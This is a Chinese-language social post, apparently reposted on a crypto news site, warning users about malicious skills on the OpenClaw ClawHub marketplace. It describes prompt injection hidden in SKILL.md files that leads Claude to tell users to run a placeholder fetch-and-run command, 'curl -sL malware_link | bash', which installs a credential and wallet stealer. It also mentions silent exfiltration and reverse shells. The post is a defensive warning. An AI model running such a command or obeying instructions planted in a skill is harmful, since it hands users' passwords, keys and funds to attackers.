Bill The Investor
Bill The Investor|2026年02月19日 23:42
币圈人别瞎几把用OpenClaw! OpenClaw的技能市场ClawHub,排名第一的热门技能“What Would Elon Do”竟然是恶意软件!下载量数千次,Cisco扫描直接爆出9个漏洞,其中2个CRITICAL级别。 核心玩法超级阴险: •攻击者用1周新GitHub账号就能上传“技能”(其实就是藏着prompt injection的Markdown文件)。 •伪装成加密交易bot、YouTube总结器、钱包追踪器,文档写得专业得一批。 •但http://SKILL.md里偷偷藏指令,诱导Claude自己告诉你跑这条命令: 
curl -sL malware_link | bash •一跑就下Atomic Stealer偷浏览器密码、SSH key、Telegram session、crypto钱包、.env里的API key,甚至钥匙串全打包。 •更狠的是,有些技能直接静默curl ping外部服务器,数据外泄零感知,还能改成开反向shell让你电脑被root远程控。 已经发现1184个恶意技能,其中一个攻击者一个人就刷了677个!这不是传统npm恶意包,这是“会思考的恶意包”——它会骗AI帮它传播、会绕安全指南、会伪装成热门工具。 想想看:你本地跑的AI代理,本来是为了帮你管邮件、日程、甚至交易,结果装个技能直接把你的Bitcoin/Ethereum钱包种子或私钥偷走,或者直接远程接管机器?这比传统供应链攻击狠多了,因为AI有“自主性”,它还能自己决定跑不跑那条curl。 教训血淋淋: 1、永远别直接从ClawHub一键安装热门技能,先自己解压grep curl | bash | eval | fetch 等危险命令。 2、AI代理生态现在零信任起步,项目方后来加了VirusTotal扫描,但信任已经崩了。 3、现在看任何“本地AI代理+技能市场”的项目,都得多问一句:审核机制呢?沙箱呢?prompt injection防护呢? AI × Crypto本来是未来最大叙事(a16z刚列了11大用例,ERC-8004主网上线,代理经济起飞),但如果安全兜不住,第一个被收割的很可能就是我们这些早鸟玩家。 大家醒醒,别让你的AI超能力变成别人偷你BTC的工具。(Bill The Investor)
+4
曾提及
分享至:

脉络

热门快讯

APP下载

X

Telegram

Facebook

Reddit

复制链接

热门阅读